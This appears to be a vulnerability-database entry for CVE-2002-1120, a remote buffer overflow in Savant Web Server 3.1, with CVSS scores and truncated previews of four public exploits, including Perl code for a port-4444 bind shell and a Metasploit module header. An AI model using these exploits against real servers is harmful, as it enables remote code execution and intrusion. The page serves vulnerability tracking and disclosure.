7.5
CVSSv2

CVE-2002-1120

Published: 24/09/2002 Updated: 05/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 770
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in Savant Web Server 3.1 and previous versions allows remote malicious users to execute arbitrary code via a long HTTP GET request.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

savant savant web server

Exploits

#!/usr/bin/python #Title: Savant web server 31 buffer overflow exploit #Author: DouBle_Zer0 #Version: 31 #Tested on: win xp sp2,3 [en] #Vulnerability discovered by Muts(offensive security) #\x83\xc4\x50\x54\xc3 -add esp,50 push esp ret[see the double dance of this in exploit] #ret=00401D09[pop ebp, ret] import socket,sys # win calcexe [metas ...
#!/usr/bin/perl -w # exploit for Savant webserver 31 remote bof # shellcode bind 4444 port on target host # # # Jacopo cervini aka acaro@jervusit # use IO::Socket; if(!($ARGV[1])) { print "Uso: savant-31pl <victim> <port>\n\n"; exit; } $victim = IO::Socket::INET->new(Proto=>'tcp', PeerA ...
## # $Id: savant_31_overflowrb 10546 2010-10-04 20:53:51Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' c ...
#!/usr/local/bin/perl # # Savant Buffer Overflow Exploit # ---------------------------------- # Infam0us Gr0up - Securiti Research # # # Tested on Windows2000 SP4 (Win NT) # Info: infamous2hellcom # Vendor URL: savantsourceforgenet # $ARGC=@ARGV; if ($ARGC !=3) { print "\nUsage: $0 [remote IP] [Port]\n"; print "Example: $0 12 ...